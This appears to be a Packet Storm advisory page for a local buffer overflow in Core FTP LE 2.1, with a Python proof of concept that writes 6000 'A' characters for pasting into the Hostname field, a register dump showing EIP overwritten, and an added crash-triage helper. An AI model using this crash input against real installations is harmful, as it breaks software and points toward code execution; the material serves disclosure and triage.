Core FTP LE 2.1 Buffer Overflow

2009-09-26T00:00:00
ID PACKETSTORM:81665
Type packetstorm
Reporter Dr_IDE
Modified 2009-09-26T00:00:00

Description

                                        
```python
#!/usr/bin/env python

####################################################################################
#
# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
# Found By: Dr_IDE
# Tested On: XPSP3, 7RC
# Notes: Most likely other versions are vulnerable too.
# Usage: File, Quick Connect, Paste into Hostname, Connect
#
####################################################################################

# Register Dump on XPSP3
"""
EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 00410041 coreftp.00410041
ESI 0269CC30
EDI 04BB6A58 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EIP 00410041 coreftp.00410041
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFD7000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""

# After Passing Exception on XPSP3
# EIP 00410041 coreftp.00410041

# 6000 ASCII "A" (0x41) characters, the string pasted into the Hostname field
buff = "\x41" * 6000

# Write the string to a text file so it can be copied from there (see Usage above)
with open("coreftple.txt", "w") as f1:
    f1.write(buff)
```
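The `00410041` values in the register dump are what two ASCII `A` bytes look like once the input has been widened to UTF-16LE and loaded as a little-endian DWORD, which is why the PoC is labelled "(Unicode)". As an added example (not part of the original PoC), here is a small crash-triage helper that flags registers in a debugger dump matching that pattern; the function names are hypothetical and the sample dump is a constructed subset of the lines above.

```python
import re

# Constructed sample: a subset of the register lines from the dump above.
SAMPLE_DUMP = """\
EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
EBP 00410041 coreftp.00410041
EIP 00410041 coreftp.00410041
"""

REG_LINE = re.compile(r"^(E[A-Z]{2})\s+([0-9A-Fa-f]{8})\b", re.MULTILINE)


def utf16_widened_ascii(value):
    """Return the two ASCII chars if a DWORD looks like UTF-16LE text, else None.

    A 32-bit little-endian load of two UTF-16LE code units for ASCII
    characters reads as 00 c2 00 c1 when printed as hex, e.g. "AA"
    -> bytes 41 00 41 00 -> 0x00410041.
    """
    raw = value.to_bytes(4, "little")
    try:
        text = raw.decode("utf-16-le")
    except UnicodeDecodeError:  # lone surrogate: not plain widened text
        return None
    if len(text) == 2 and all(0x20 <= ord(c) < 0x7F for c in text):
        return text
    return None


def triage(dump):
    """Map register name -> decoded chars for registers holding widened ASCII."""
    hits = {}
    for name, hexval in REG_LINE.findall(dump):
        decoded = utf16_widened_ascii(int(hexval, 16))
        if decoded is not None:
            hits[name] = decoded
    return hits


if __name__ == "__main__":
    for reg, chars in triage(SAMPLE_DUMP).items():
        note = " <- instruction pointer holds input data" if reg == "EIP" else ""
        print(f"{reg} = UTF-16LE {chars!r}{note}")
```

A hit on EIP or EBP in a crash report is a strong signal that a stack frame was overwritten with widened user input, which helps prioritise the crash for a fix.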